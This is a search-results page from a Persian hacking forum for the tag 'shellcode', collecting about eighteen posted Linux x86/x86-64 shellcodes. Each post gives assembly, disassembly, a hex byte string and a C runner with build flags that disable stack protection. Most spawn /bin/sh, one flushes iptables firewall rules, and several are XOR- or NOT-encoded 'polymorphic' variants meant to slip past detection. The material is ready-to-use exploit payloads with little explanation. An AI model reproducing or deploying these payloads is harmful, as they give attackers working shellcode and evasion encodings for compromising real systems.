رفتن به مطلب
امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند



iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'shellcode'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

192 نتیجه پیدا شد

  1. Hacking

    # [Linux/X86-64] # Dummy for shellcode: # execve("/bin/sh", ["/bin/sh"], NULL) # hophet [at] gmail.com .text .globl _start _start: xorq %rdx, %rdx movq $0x68732f6e69622fff,%rbx shr $0x8, %rbx push %rbx movq %rsp,%rdi xorq %rax,%rax pushq %rax pushq %rdi movq %rsp,%rsi mov $0x3b,%al # execve(3b) syscall pushq $0x1 pop %rdi pushq $0x3c # exit(3c) pop %rax syscall
  2. Hacking

    /* William Borskey 2015 Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm. 1 ; int execve(const char *filename, char *const argv[], char *const envp[]); 2 BITS 64 3 4 section .text 5 global start 6 7 start: 8 mov rcx, 0x1168732f6e69622f ;move the immediate value /bin/sh in hex in 9 ;little endian byte order into rcx padded with 11 10 shl rcx, 0x08 ;left shift to trim off the two bytes of padding 11 shr rcx, 0x08 ;ringht shift to re order string 12 push rcx ;push the immediate value stored in rcx onto the stack 13 lea rdi, [rsp] ;load the address of the string that is on the stack into rsi 14 xor rdx, rdx ;zero out rdx for an execve argument 15 mov al, 0x3b ;move 0x3b (execve sycall) into al to avoid nulls 16 syscall ;make the syscall */ char shellcode[] = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) shellcode; (int)(*func)(); return 0; }
  3. Hacking

    /* --------------------------------------------------------------------------------------------------- Linux/x86_x64 - execve(/bin/sh) - 26 bytes Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] Om Asato Maa Sad-Gamaya | Tamaso Maa Jyotir-Gamaya | Mrtyor-Maa Amrtam Gamaya | Om Shaantih Shaantih Shaantih | --------------------------------------------------------------------------------------------------- Disassembly of section .text: 0000000000400080 <.text>: 400080: eb 0b jmp 0x40008d 400082: 5f pop %rdi 400083: 48 31 d2 xor %rdx,%rdx 400086: 48 89 d6 mov %rdx,%rsi 400089: b0 3b mov $0x3b,%al 40008b: 0f 05 syscall 40008d: e8 f0 ff ff ff callq 0x400082 400092: 2f (bad) 400093: 2f (bad) 400094: 62 (bad) 400095: 69 .byte 0x69 400096: 6e outsb %ds:(%rsi),(%dx) 400097: 2f (bad) 400098: 73 68 jae 0x400102 --------------------------------------------------------------------------------------------------- How To Run $ gcc -o sh_shell sh_shell.c $ execstack -s sh_shell $ ./sh_shell --------------------------------------------------------------------------------------------------- */ #include <stdio.h> char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x48\x89\xd6\xb0\x3b\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68"; void main(int argc, char **argv) { int (*func)(); func = (int (*)()) sh; (int)(*func)(); }
  4. Hacking

    /* --------------------------------------------------------------------------------------------------- Linux/x86_x64 - execve(/bin/sh) - 25 bytes Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] Om Asato Maa Sad-Gamaya | Tamaso Maa Jyotir-Gamaya | Mrtyor-Maa Amrtam Gamaya | Om Shaantih Shaantih Shaantih | Thanks for Unknown Commented in my Blog --------------------------------------------------------------------------------------------------- Disassembly of section .text: 0000000000400080 <.text>: 400080: eb 0b jmp 0x40008d 400082: 5f pop rdi 400083: 48 31 d2 xor rdx,rdx 400086: 52 push rdx 400087: 5e pop rsi 400088: 6a 3b push 0x3b 40008a: 58 pop rax 40008b: 0f 05 syscall 40008d: e8 f0 ff ff ff call 0x400082 400092: 2f (bad) 400093: 62 (bad) 400094: 69 .byte 0x69 400095: 6e outs dx,BYTE PTR ds:[rsi] 400096: 2f (bad) 400097: 73 68 jae 0x400101 --------------------------------------------------------------------------------------------------- How To Run $ gcc -o sh_shell sh_shell.c $ execstack -s sh_shell $ ./sh_shell --------------------------------------------------------------------------------------------------- */ #include <stdio.h> char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; void main(int argc, char **argv) { int (*func)(); func = (int (*)()) sh; (int)(*func)(); }
  5. Hacking

    /* --------------------------------------------------------------------------------------------------- Linux/x86_x64 - execve(/bin/bash) - 33 bytes Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] Om Asato Maa Sad-Gamaya | Tamaso Maa Jyotir-Gamaya | Mrtyor-Maa Amrtam Gamaya | Om Shaantih Shaantih Shaantih | --------------------------------------------------------------------------------------------------- Disassembly of section .text: 0000000000400080 <.text>: 400080: eb 0b jmp 0x40008d 400082: 5f pop rdi 400083: 48 31 d2 xor rdx,rdx 400086: 52 push rdx 400087: 5e pop rsi 400088: 6a 3b push 0x3b 40008a: 58 pop rax 40008b: 0f 05 syscall 40008d: e8 f0 ff ff ff call 0x400082 400092: 2f (bad) 400093: 2f (bad) 400094: 2f (bad) 400095: 2f (bad) 400096: 62 (bad) 400097: 69 6e 2f 2f 2f 2f 2f imul ebp,DWORD PTR [rsi+0x2f],0x2f2f2f2f 40009e: 62 .byte 0x62 40009f: 61 (bad) 4000a0: 73 68 jae 0x40010a --------------------------------------------------------------------------------------------------- How To Run $ gcc -o bash_shell bash_shell.c $ execstack -s bash_shell $ ./bash_shell --------------------------------------------------------------------------------------------------- */ #include <stdio.h> char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x62\x61\x73\x68"; void main(int argc, char **argv) { int (*func)(); func = (int (*)()) sh; (int)(*func)(); }
  6. /* Title: Linux/x86-64 - execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL) - 49 bytes Author: 10n1z3d <10n1z3d[at]w[dot]cn> Date: Fri 09 Jul 2010 03:26:12 PM EEST Source Code (NASM): section .text global _start _start: xor rax, rax push rax push word 0x462d mov rcx, rsp mov rbx, 0x73656c626174ffff shr rbx, 0x10 push rbx mov rbx, 0x70692f6e6962732f push rbx mov rdi, rsp push rax push rcx push rdi mov rsi, rsp ; execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL); mov al, 0x3b syscall */ #include <stdio.h> char shellcode[] = "\x48\x31\xc0\x50\x66\x68\x2d\x46\x48\x89\xe1\x48\xbb\xff\xff" "\x74\x61\x62\x6c\x65\x73\x48\xc1\xeb\x10\x53\x48\xbb\x2f\x73" "\x62\x69\x2f\x69\x70\x53\x48\x89\xe7\x50\x51\x57\x48\x89\xe6" "\xb0\x3b\x0f\x05"; int main() { printf("Length: %d bytes.\n'", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; }
  7. Hacking

    # Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode # Date: 2010-04-26 # Author: zbt # Tested on: x86_64 Debian GNU/Linux /* ; execve("/bin/sh", ["/bin/sh"], NULL) section .text global _start _start: xor rdx, rdx mov qword rbx, '//bin/sh' shr rbx, 0x8 push rbx mov rdi, rsp push rax push rdi mov rsi, rsp mov al, 0x3b syscall */ int main(void) { char shellcode[] = "\x48\x31\xd2" // xor %rdx, %rdx "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx "\x48\xc1\xeb\x08" // shr $0x8, %rbx "\x53" // push %rbx "\x48\x89\xe7" // mov %rsp, %rdi "\x50" // push %rax "\x57" // push %rdi "\x48\x89\xe6" // mov %rsp, %rsi "\xb0\x3b" // mov $0x3b, %al "\x0f\x05"; // syscall (*(void (*)()) shellcode)(); return 0; }
  8. Hacking

    Hi, This time I wanna to submit a shellcode whose length is 31Bytes , It's tested on Linux x86-64 ;=========================================================== ===================== ; The MIT License ; ; Copyright (c) <year> <copyright holders> ; ; Permission is hereby granted, free of charge, to any person obtaining a copy ; of this software and associated documentation files (the " Software"), to deal ; in the Software without restriction, including without limitation the rights ; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ; copies of the Software, and to permit persons to whom the Software is ; furnished to do so, subject to the following conditions: ; ; The above copyright notice and this permission notice shall be included in ; all copies or substantial portions of the Software. ; ; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHER WISE, ARISING FROM, ; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN ; THE SOFTWARE. ;=========================================================== ===================== ; Name : Linux/x86-64 - execve("/bin/sh") 31 Bytes ; Author : WangYihang ; Email : [email protected] ; Tested on: Linux_x86-64 ;=========================================================== ===================== ; Shellcode (c array) : char shellcode[] = " \x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05 "; ;=========================================================== ===================== ; Shellcode (python) : shellcode = " \x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05 " ;=========================================================== ===================== ; objdump -d ./shellcode shellcode: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 <_start>: 400080: 48 31 ff xor %rdi,%rdi 400083: 48 31 f6 xor %rsi,%rsi 400086: 48 31 d2 xor %rdx,%rdx 400089: 48 31 c0 xor %rax,%rax 40008c: 50 push %rax 40008d: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 400094: 2f 73 68 400097: 53 push %rbx 400098: 48 89 e7 mov %rsp,%rdi 40009b: b0 3b mov $0x3b,%al 40009d: 0f 05 syscall ============================ ===================== ; Assembly language code : ; You can asm it by using : ; nasm -f elf64 ./shellcode.asm ; ld -o shellcode shellcode.o global _start _start: xor rdi, rdi xor rsi, rsi xor rdx, rdx xor rax, rax push rax ; 68 73 2f 2f 6e 69 62 2f mov rbx, 68732f2f6e69622fH push rbx mov rdi, rsp mov al, 59 syscall
  9. Hacking

    #include <stdio.h> #include <string.h> /* by Magnefikko 14.04.2010 [email protected] promhyl.oz.pl Subgroup: #PRekambr Name: 25 bytes execve("/bin/sh") shellcode Platform: Linux x86 execve("/bin/sh", 0, 0); gcc -Wl,-z,execstack filename.c shellcode: \xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68 */ int main(){ char shell[] = "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; printf("by Magnefikko\[email protected]\npromhyl.oz.pl\n\nstrlen(shell) = %d\n", strlen(shell)); (*(void (*)()) shell)(); }
  10. Hacking

    ;================================================================================ ; The MIT License ; ; Copyright (c) <year> <copyright holders> ; ; Permission is hereby granted, free of charge, to any person obtaining a copy ; of this software and associated documentation files (the "Software"), to deal ; in the Software without restriction, including without limitation the rights ; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ; copies of the Software, and to permit persons to whom the Software is ; furnished to do so, subject to the following conditions: ; ; The above copyright notice and this permission notice shall be included in ; all copies or substantial portions of the Software. ; ; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, ; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN ; THE SOFTWARE. ;================================================================================ ; Name : Linux/x86-64 - execve("/bin/sh") 21 Bytes ; Author : WangYihang ; Email : [email protected] ; Tested on: Linux_x86-64 ;================================================================================ ; Shellcode (c array) : char shellcode[] = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69" "\x6e\x2f\x2f\x73\x68\x57\x48\x89" "\xe7\xb0\x3b\x0f\x05"; ;================================================================================ ; Shellcode (python) : shellcode = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05" ;================================================================================ ; objdump -d ./shellcode shellcode: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 <_start>: 400080: f7 e6 mul %esi 400082: 50 push %rax 400083: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi 40008a: 2f 73 68 40008d: 57 push %rdi 40008e: 48 89 e7 mov %rsp,%rdi 400091: b0 3b mov $0x3b,%al 400093: 0f 05 syscall ;================================================================================ ; Assembly language code : ; You can asm it by using : ; nasm -f elf64 ./shellcode.asm ; ld -o shellcode shellcode.o global _start _start: mul esi push rax mov rdi, "/bin//sh" push rdi mov rdi, rsp mov al, 59 syscall
  11. Hacking

    ;Title: execve shellcode 22 bytes ;Author: d4sh&r ;Contact: https://mx.linkedin.com/in/d4v1dvc ;Category: Shellcode ;Architecture:linux x86_64 ;SLAE64-1379 ;Description: ;Shellcode in 22 bytes to get a shell ;Tested on : Linux kali64 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 x86_64 GNU/Linux ;Compilation and execution ;nasm -felf64 shell.nasm -o shell.o ;ld shell.o -o shell ;./shell global _start _start: mul esi push rdx mov rbx, 0x68732f2f6e69622f ;/bin//sh push rbx lea rdi, [rsp] ;address of /bin//sh mov al, 59 ;execve syscall /*compile with gcc -fno-stack-protector -z exestack */ unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"; main() { int (*ret)()=(int(*)()) code; ret(); }
  12. Hacking

    /* ;Title: polymorphic execve shellcode ;Author: d4sh&r ;Contact: https://mx.linkedin.com/in/d4v1dvc ;Category: Shellcode ;Architecture:linux x86_64 ;SLAE64-1379 ;Description: ;Polymorphic shellcode in 31 bytes to get a shell ;Tested on : Linux kali64 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 x86_64 GNU/Linux ;Compilation and execution ;nasm -felf64 shell.nasm -o shell.o ;ld shell.o -o shell ;./shell global _start _start: mul esi push rdx mov al,1 mov rbx, 0xd2c45ed0e65e5edc ;/bin//sh rol rbx,24 shr rbx,1 push rbx lea rdi, [rsp] ;address of /bin//sh add al,58 syscall */ #include<stdio.h> //gcc -fno-stack-protector -z execstack shellcode.c -o shellcode unsigned char code[] = "\xf7\xe6\x52\xb0\x01\x48\xbb\xdc\x5e\x5e\xe6\xd0\x5e\xc4\xd2\x48\xc1\xc3\x18\x48\xd1\xeb\x53\x48\x8d\x3c\x24\x04\x3a\x0f\x05"; main() { int (*ret)()=(int(*)()) code; ret(); }
  13. Hacking

    /* Compile with: gcc -fno-stack-protector -z execstack This execve shellcode is encoded with 0xff and is for 64 bit linux. shell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 <start>: 400080: 48 b9 ff ff ff ff ff movabs rcx,0xffffffffffffffff 400087: ff ff ff=20 40008a: 49 b8 ae b7 72 c3 db movabs r8,0xfffaf0dbc372b7ae 400091: f0 fa ff=20 400094: 49 31 c8 xor r8,rcx 400097: 41 50 push r8 400099: 49 b8 d0 9d 96 91 d0 movabs r8,0x978cd0d091969dd0 4000a0: d0 8c 97=20 4000a3: 49 31 c8 xor r8,rcx 4000a6: 41 50 push r8 4000a8: 49 b8 b7 ce 2d ad 4f movabs r8,0x46b7c44fad2dceb7 4000af: c4 b7 46=20 4000b2: 49 31 c8 xor r8,rcx 4000b5: 41 50 push r8 4000b7: ff e4 jmp rsp 2015 William Borskey */ char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) shellcode; (int)(*func)(); return 0; }
  14. Hacking

    /* Compile with: gcc -fno-stack-protector -z execstack This execve shellcode is encoded with 0xff and is for 64 bit linux. shell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 <start>: 400080: 48 b9 ff ff ff ff ff movabs rcx,0xffffffffffffffff 400087: ff ff ff 40008a: 49 b8 ae b7 72 c3 db movabs r8,0xfffaf0dbc372b7ae 400091: f0 fa ff 400094: 49 31 c8 xor r8,rcx 400097: 41 50 push r8 400099: 49 b8 d0 9d 96 91 d0 movabs r8,0x978cd0d091969dd0 4000a0: d0 8c 97 4000a3: 49 31 c8 xor r8,rcx 4000a6: 41 50 push r8 4000a8: 49 b8 b7 ce 2d ad 4f movabs r8,0x46b7c44fad2dceb7 4000af: c4 b7 46 4000b2: 49 31 c8 xor r8,rcx 4000b5: 41 50 push r8 4000b7: ff e4 jmp rsp 2015 William Borskey */ char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) shellcode; (int)(*func)(); return 0; }
  15. Hacking

    /* # # Execve /bin/sh Shellcode Via Push (Linux x86_64 23 bytes) # # Dying to be the shortest. # # Copyright (C) 2015 Gu Zhengxiong ([email protected]) # # 27 April 2015 # # GPL # .global _start _start: # char *const argv[] xorl %esi, %esi # 'h' 's' '/' '/' 'n' 'i' 'b' '/' movq $0x68732f2f6e69622f, %rbx # for '\x00' pushq %rsi pushq %rbx pushq %rsp # const char *filename popq %rdi # __NR_execve 59 pushq $59 popq %rax # char *const envp[] xorl %edx, %edx syscall */ /* gcc -z execstack push64.c uname -r 3.19.3-3-ARCH */ #include <stdio.h> #include <string.h> int main(void) { char *shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56" "\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"; printf("strlen(shellcode)=%d\n", strlen(shellcode)); ((void (*)(void))shellcode)(); return 0; }
  16. Hacking

    ;The MIT License (MIT) ;Copyright (c) 2017 Robert L. Taylor ;Permission is hereby granted, free of charge, to any person obtaining a ;copy of this software and associated documentation files (the “Software”), ;to deal in the Software without restriction, including without limitation ;the rights to use, copy, modify, merge, publish, distribute, sublicense, ;and/or sell copies of the Software, and to permit persons to whom the ;Software is furnished to do so, subject to the following conditions: ;The above copyright notice and this permission notice shall be included ;in all copies or substantial portions of the Software. ;The Software is provided “as is”, without warranty of any kind, express or ;implied, including but not limited to the warranties of merchantability, ;fitness for a particular purpose and noninfringement. In no event shall the ;authors or copyright holders be liable for any claim, damages or other ;liability, whether in an action of contract, tort or otherwise, arising ;from, out of or in connection with the software or the use or other ;dealings in the Software. ; ; For a detailed explanation of this shellcode see my blog post: ; http://a41l4.blogspot.ca/2017/01/execvestack1434.html global _start section .text _start: ; zeros RAX, RDX and RSI with only 4 bytes of machine code xor esi,esi mul esi ; null terminator for the following string push rax ; push /bin//sh in reverse mov rbx,'/bin//sh' push rbx ; store /bin//sh address in RDI, points at string push rsp pop rdi ; Call the Execve syscall mov al, 59 syscall
  17. /*--------------------------------------------------------------------------------------------------------------------- /* *Title: x86_64 linux-Xor/not/div encoded execve shellcode *Author: Sathish kumar *Contact: https://www.linkedin.com/in/sathish94 * Copyright: (c) 2016 iQube. (http://iQube.io) * Release Date: January 6, 2016 *Description: X86_64 linux-Xor/not/div encoded execve shellcode 54 bytes *Tested On: Ubuntu 14.04 LTS *SLAE64-1408 *Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell * ./bindshell * * */ /* global _start section .text _start: jmp short call_shellcode decoder: pop rdi xor rcx, rcx xor rdx, rdx xor rax, rax mov cl, 26 decode: not byte [rdi] ; not function is appplied xor byte [rdi], 0xee ; xor function with 0xee mov rax, rdi ; multiplication is done mov ecx, 0x2 mul ecx mov rdi, rax inc rdi loop decode ; loop continues until the shellcode size is completed jmp short shellcode_to_decode ; Pointed to the decoded shellcode call_shellcode: call decoder shellcode_to_decode: db 0x35,0x09,0x6a,0x35,0x6a,0x62,0x22,0x39,0x35,0x4c,0x06,0x20,0x25,0x26,0x06,0x06,0x28,0x25,0x38,0x3b,0x3e,0x24,0x0c,0x3d,0x16,0x13 */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\xeb\x15\x5f\x48\x31\xc9\xb1\x1a\x80\x37\xee\xf6\x17\x80\x2f\x03\x48\xff\xc7\xe2\xf3\xeb\x05\xe8\xe6\xff\xff\xff\x5a\x25\xe8\x5a\xeb\xf8\x78\x42\x5a\xaf\x23\x74\x7d\x60\x23\x23\x67\x7a\x47\x46\x73\x7c\x2f\x4a\x03\x19"; main() { printf("Shellcode Length: %d\n", (int)strlen(code)); int (*ret)() = (int(*)())code; ret(); }
  18. Hacking

    /* # Title : Linux x86_64 XOR encode execve("/bin//sh",{"//bin/sh","-i",NULL},NULL) shellcode # Date : 31-05-2016 # Author : Roziul Hasan Khan Shifat # Tested On : Ubuntu 14.04 LTS x86_64 */ /* main code ------------------------ section .text global _start _start: xor rax,rax xor rdx,rdx push rax push rax mov [rsp],dword '//bi' mov [rsp+4],dword 'n/sh' mov rdi,rsp push rax push rax mov [rsp],word '-i' mov rsi,rsp push rdx push rsi push rdi mov rsi,rsp add rax,59 syscall Disassembly ------------------ Disassembly of section .text: 0000000000400080 <_start>: 400080: 48 31 c0 xor %rax,%rax 400083: 48 31 d2 xor %rdx,%rdx 400086: 50 push %rax 400087: 50 push %rax 400088: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp) 40008f: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp) 400096: 68 400097: 48 89 e7 mov %rsp,%rdi 40009a: 50 push %rax 40009b: 50 push %rax 40009c: 66 c7 04 24 2d 69 movw $0x692d,(%rsp) 4000a2: 48 89 e6 mov %rsp,%rsi 4000a5: 52 push %rdx 4000a6: 56 push %rsi 4000a7: 57 push %rdi 4000a8: 48 89 e6 mov %rsp,%rsi 4000ab: 48 83 c0 3b add $0x3b,%rax 4000af: 0f 05 syscall */ /* encoder -------------- I used a python script and a C program to encode shellcode python script --------------------- a="\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\x66\xc7\x04\x24\x2d\x69\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05" print "shellcode length %d"%len(a) a=a[::-1] for i in range(len(a)-1): print a[i].encode('hex') C program ----------------- #include<stdio.h> #include<string.h> main(int i,char *a[]) { if(i!=2) { printf("Usage %s <filename>\n",a[0]); return 0; } FILE *f,*o; f=fopen(a[1],"r"); int shell; o=fopen("shellencode.txt","w"); if(!f || !o ) { perror("FILE I/O error: "); return 0; } while( (fscanf(f,"%x",&shell)) !=EOF ) { printf("%.2x\n",shell); fprintf(o,"%#.2x,",shell^0x90); //0x90 is seed key fflush(o); } fclose(o); fclose(f); return 0; } --------------------------------------------------------------------------------------------------------------------------------- I am sorry that My python script is very Poor .Search internet for better XOR encoder python script MY Python script Reverse the shellcode Then COPY & Paste the rerversed shellcode into a file then i use the C program to encode reversed shellcode and write down shellencode.txt ----------------------------------------------------------------------------------------------------------------------------- */ /* decoder --------------- section .text global _start _start: jmp shellcode decoder: pop rsi xor rcx,rcx mov cl,49 cdq mov dl,0x90 ;seed key decode: xor rax,rax mov al,[rsi] xor al,dl dec rsp mov [rsp],byte al inc rsi loop decode call rsp shellcode: call decoder db 0x95,0x9f,0xab,0x50,0x13,0xd8,0x76,0x19,0xd8,0xc7,0xc6,0xc2,0x76,0x19,0xd8,0xf9,0xbd,0xb4,0x94,0x57,0xf6,0xc0,0xc0,0x77,0x19,0xd8,0xf8,0xe3,0xbf,0xfe,0x94,0xb4,0xd4,0x57,0xf9,0xf2,0xbf,0xbf,0xb4,0x94,0x57,0xc0,0xc0,0x42,0xa1,0xd8,0x50,0xa1 Disassembly ------------------- Disassembly of section .text: 0000000000400080 <_start>: 400080: eb 1d jmp 40009f <shellcode> 0000000000400082 <decoder>: 400082: 5e pop %rsi 400083: 48 31 c9 xor %rcx,%rcx 400086: b1 31 mov $0x31,%cl 400088: 99 cltd 400089: b2 90 mov $0x90,%dl 000000000040008b <decode>: 40008b: 48 31 c0 xor %rax,%rax 40008e: 8a 06 mov (%rsi),%al 400090: 30 d0 xor %dl,%al 400092: 48 ff cc dec %rsp 400095: 88 04 24 mov %al,(%rsp) 400098: 48 ff c6 inc %rsi 40009b: e2 ee loop 40008b <decode> 40009d: ff d4 callq *%rsp 000000000040009f <shellcode>: 40009f: e8 de ff ff ff callq 400082 <decoder> 4000a4: 95 xchg %eax,%ebp 4000a5: 9f lahf 4000a6: ab stos %eax,%es:(%rdi) 4000a7: 50 push %rax 4000a8: 13 d8 adc %eax,%ebx 4000aa: 76 19 jbe 4000c5 <shellcode+0x26> 4000ac: d8 c7 fadd %st(7),%st 4000ae: c6 c2 76 mov $0x76,%dl 4000b1: 19 d8 sbb %ebx,%eax 4000b3: f9 stc 4000b4: bd b4 94 57 f6 mov $0xf65794b4,%ebp 4000b9: c0 c0 77 rol $0x77,%al 4000bc: 19 d8 sbb %ebx,%eax 4000be: f8 clc 4000bf: e3 bf jrcxz 400080 <_start> 4000c1: fe (bad) 4000c2: 94 xchg %eax,%esp 4000c3: b4 d4 mov $0xd4,%ah 4000c5: 57 push %rdi 4000c6: f9 stc 4000c7: f2 bf bf b4 94 57 repnz mov $0x5794b4bf,%edi 4000cd: c0 c0 42 rol $0x42,%al 4000d0: a1 .byte 0xa1 4000d1: d8 50 a1 fcoms -0x5f(%rax) */ /* The shellcode decoder.asm is the encoded shellcode */ char shellcode[]="\xeb\x1d\x5e\x48\x31\xc9\xb1\x31\x99\xb2\x90\x48\x31\xc0\x8a\x06\x30\xd0\x48\xff\xcc\x88\x04\x24\x48\xff\xc6\xe2\xee\xff\xd4\xe8\xde\xff\xff\xff\x95\x9f\xab\x50\x13\xd8\x76\x19\xd8\xc7\xc6\xc2\x76\x19\xd8\xf9\xbd\xb4\x94\x57\xf6\xc0\xc0\x77\x19\xd8\xf8\xe3\xbf\xfe\x94\xb4\xd4\x57\xf9\xf2\xbf\xbf\xb4\x94\x57\xc0\xc0\x42\xa1\xd8\x50\xa1"; int main(int i,char *a[]) { (* (int(*)()) shellcode)(); }
  19. Hacking

